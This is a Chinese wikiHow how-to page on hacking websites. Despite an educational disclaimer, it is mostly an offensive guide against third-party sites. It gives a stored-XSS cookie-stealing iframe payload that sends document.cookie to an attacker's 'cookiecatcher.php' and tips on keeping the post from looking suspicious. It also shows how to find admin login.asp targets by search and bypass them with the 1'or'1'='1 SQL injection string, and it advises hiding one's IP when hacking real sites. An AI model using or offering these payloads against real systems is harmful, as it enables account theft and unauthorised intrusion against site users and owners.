如何入侵一个网站

PDF download 下载PDF文件
PDF download 下载PDF文件

注意:这篇指南文章只作教育用途,应该用在正当的入侵测试上,用来提升网站的安全性。这篇指南文章会教你如何一步步入侵安全性低的网站。

方法 1
方法 1 的 3:

使用跨站点脚本处理方法

PDF download 下载PDF文件
  1. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/e\/e6\/Hack-a-Website-Step-1-Version-2.jpg\/v4-460px-Hack-a-Website-Step-1-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/e\/e6\/Hack-a-Website-Step-1-Version-2.jpg\/v4-728px-Hack-a-Website-Step-1-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    比如可以发布信息帖子的网站。注意,如果网站安全性强,下面入侵方法就不起作用。
  2. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/2\/2f\/Hack-a-Website-Step-2-Version-2.jpg\/v4-460px-Hack-a-Website-Step-2-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/2\/2f\/Hack-a-Website-Step-2-Version-2.jpg\/v4-728px-Hack-a-Website-Step-2-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    要在帖子内容中输入一些内容,这样不管谁点击了帖子,数据都会被窃取。
    • 你可以测试一下,看看该网站系统会不会过滤代码。在帖子中输入<script...>alert(“test”)</...script> (把句点删掉)。如果点击帖子的时候,会出现一个警告窗口,说明站点易受攻击。
  3. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/4\/46\/Hack-a-Website-Step-3-Version-2.jpg\/v4-460px-Hack-a-Website-Step-3-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/4\/46\/Hack-a-Website-Step-3-Version-2.jpg\/v4-728px-Hack-a-Website-Step-3-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    本攻击的目的是窃取用户的cookie内容,通过cookie内容,你就可以轻松登录安全性弱的网站,进入对方的账户。这里你需要准备cookie捕捉器(某种代码),这个代码会捕捉用户的cookie并转发出去,你可以给一个可以登录的,又支持PHP网页的网站上传一个捕捉器。例子里有个cookie捕捉器供参考。
  4. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/b\/b9\/Hack-a-Website-Step-4-Version-2.jpg\/v4-460px-Hack-a-Website-Step-4-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/b\/b9\/Hack-a-Website-Step-4-Version-2.jpg\/v4-728px-Hack-a-Website-Step-4-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    输入一定的代码,就可以让帖子抓取用户的cookie,并发送到你的网站中去。你需要在代码之后输入一些文字,减少访客的怀疑,并减少管理员删帖的几率。
    • cookie捕捉器的例子:<...iframe... frameborder= 0 height=0 width=0 src=javascript...:void(document.location=”YOURURL/cookiecatcher.php?c=”+document.cookie)><.../iframe>(将句点删掉。)
  5. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/d\/df\/Hack-a-Website-Step-5-Version-2.jpg\/v4-460px-Hack-a-Website-Step-5-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/d\/df\/Hack-a-Website-Step-5-Version-2.jpg\/v4-728px-Hack-a-Website-Step-5-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    之后就可以将抓取的cookie发送到你的网站,你可以随意使用对方的cookies了。
    广告
方法 2
方法 2 的 3:

执行注入式攻击

PDF download 下载PDF文件
  1. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/a\/a2\/Hack-a-Website-Step-6-Version-2.jpg\/v4-460px-Hack-a-Website-Step-6-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/a\/a2\/Hack-a-Website-Step-6-Version-2.jpg\/v4-728px-Hack-a-Website-Step-6-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    你要找到一个管理员(admin)账户安全性低、容易破解的网站。你可以在google上找 admin login.asp 这两个关键词。
  2. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/a\/af\/Hack-a-Website-Step-7-Version-2.jpg\/v4-460px-Hack-a-Website-Step-7-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/a\/af\/Hack-a-Website-Step-7-Version-2.jpg\/v4-728px-Hack-a-Website-Step-7-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    输入admin作为用户名,然后用数字或一串字母作为密码登录进去。密码可能是任何数字和字母的组合,但最常见的例子有1’或’1’=’1。
  3. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/5\/5b\/Hack-a-Website-Step-8-Version-2.jpg\/v4-460px-Hack-a-Website-Step-8-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/5\/5b\/Hack-a-Website-Step-8-Version-2.jpg\/v4-728px-Hack-a-Website-Step-8-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    可能会试错几次密码,所以要久一点。
  4. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/2\/26\/Hack-a-Website-Step-9-Version-2.jpg\/v4-460px-Hack-a-Website-Step-9-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/2\/26\/Hack-a-Website-Step-9-Version-2.jpg\/v4-728px-Hack-a-Website-Step-9-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    最后就可以以某个密码登录进安全性低的网站,进行入侵了。
    广告
方法 3
方法 3 的 3:

为成功入侵做准备

PDF download 下载PDF文件
  1. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/0\/00\/Hack-a-Website-Step-10-Version-2.jpg\/v4-460px-Hack-a-Website-Step-10-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/0\/00\/Hack-a-Website-Step-10-Version-2.jpg\/v4-728px-Hack-a-Website-Step-10-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    要是你想要真正掌握破解网站的本质方法,你得了解电脑和各种互联网运行的方式。可以学一两种像Python或SQL的编程语言,这样你就可以更好地掌控电脑,找出网站系统中的脆弱点了。
  2. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/2\/2f\/Hack-a-Website-Step-11-Version-2.jpg\/v4-460px-Hack-a-Website-Step-11-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/2\/2f\/Hack-a-Website-Step-11-Version-2.jpg\/v4-728px-Hack-a-Website-Step-11-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    你也需要对HTML和javascript有很好的了解,这样就能针对性地破解某些网页了。这些代码需要一段时间的学习,不过网上有很多很好的学习资料,要是你仔细找的话,不愁找不到的。
  3. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/a\/a2\/Hack-a-Website-Step-12-Version-2.jpg\/v4-460px-Hack-a-Website-Step-12-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/a\/a2\/Hack-a-Website-Step-12-Version-2.jpg\/v4-728px-Hack-a-Website-Step-12-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    白帽黑客是身具黑客知识,把能力发挥在正当之处的特殊黑客。白帽黑客会曝光安全漏洞,还会让互联网更稳定实用。要是你也想发挥正义的力量,或者想保护自家网站的安全,你可以咨询一些白帽黑客了解一些建议。
  4. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/2\/2c\/Hack-a-Website-Step-13-Version-2.jpg\/v4-460px-Hack-a-Website-Step-13-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/2\/2c\/Hack-a-Website-Step-13-Version-2.jpg\/v4-728px-Hack-a-Website-Step-13-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    想了解怎么入侵网站,或者想要保护自己的网站,你需要做很多研究工作。网站受攻击的方式有很多种的,所以要坚持学习相关知识。
  5. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/c\/ce\/Hack-a-Website-Step-14-Version-2.jpg\/v4-460px-Hack-a-Website-Step-14-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/c\/ce\/Hack-a-Website-Step-14-Version-2.jpg\/v4-728px-Hack-a-Website-Step-14-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    因为网站的入侵方式也在不断变化,你要确保自己跟上最前沿的相关知识。一种攻击奈何不了你,不代表你就没有其他漏洞了!
    广告

小提示

  • 访问黑客论坛,了解各种有用的技巧。
广告

警告

  • 要是你在现实生活中尝试入侵网站,用一些软件掩盖住你的IP地址。
  • 光读这篇网站,是不能让你瞬间变为一名黑客的。你一定要多涉猎各种知识,多多练习,才能成功。
  • 入侵网站绝对是非法的。如果入侵网站责任在你,你一定会惹上法律问题。
广告

你可能还喜欢

如何
从网站上免费下载视频
如何
下载 Google Play 应用商店
如何
下载BT种子文件
如何
在Gmail上查找已归档的邮件
如何
下载谷歌浏览器(Chrome)
如何判断某人是否有多个Instagram账号
如何
在没有Gmail帐户的情况下使用YouTube
如何
使用图片轻松地搜索和查找某人的信息
如何
启用网页浏览器 Cookie
如何
在Linux系统中查看IP地址
如何
禁用Cookie
如何
查找子网掩码
如何
获取图片的URL地址
如何
在谷歌邮箱里撤回邮件
广告

参考

  1. http://defencely.com/blog/10-popular-ways-hackers-hack-website/
  2. http://www.benwiggy.com/hacking/website_hacking.php

关于本wikiHow

其他语言
本页面已经被访问过136,740次。

这篇文章对你有帮助吗?

广告